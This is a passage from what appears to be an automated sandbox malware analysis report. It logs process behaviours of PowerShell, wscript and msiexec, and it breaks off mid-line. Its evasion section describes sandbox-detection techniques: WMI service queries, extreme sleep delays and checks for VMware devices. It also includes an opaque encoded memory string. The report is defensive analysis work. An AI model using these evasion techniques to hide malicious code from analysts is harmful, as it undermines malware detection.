Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

11_2_0040DD85

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6872	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2902	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7646	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1932	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	API coverage: 8.9 %
Source: C:\Windows\SysWOW64\msiexec.exe	API coverage: 8.3 %

Source: C:\Windows\System32\wscript.exe TID: 7476	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7976	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380	Thread sleep count: 119 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380	Thread sleep time: -357000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380	Thread sleep count: 9860 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6380	Thread sleep time: -29580000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_209010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_209010F1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_20906580 FindFirstFileExA,	7_2_20906580
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,	11_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	12_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	13_2_00407898

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_00418981 memset,GetSystemInfo,

11_2_00418981

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000002.00000002.1487804584.000001C4E67C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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
Source: wscript.exe, 00000000.00000002.1356895387.0000023D99824000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: wscript.exe, 00000000.00000003.1354500084.0000023D97861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.1356378419.0000023D97867000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000003.1354005111.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1344006015.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354712379.0000023D97873000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354433204.0000023D97872000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343400870.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356895387.0000023D99824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343793550.0000023D9784B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356419474.0000023D97873000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 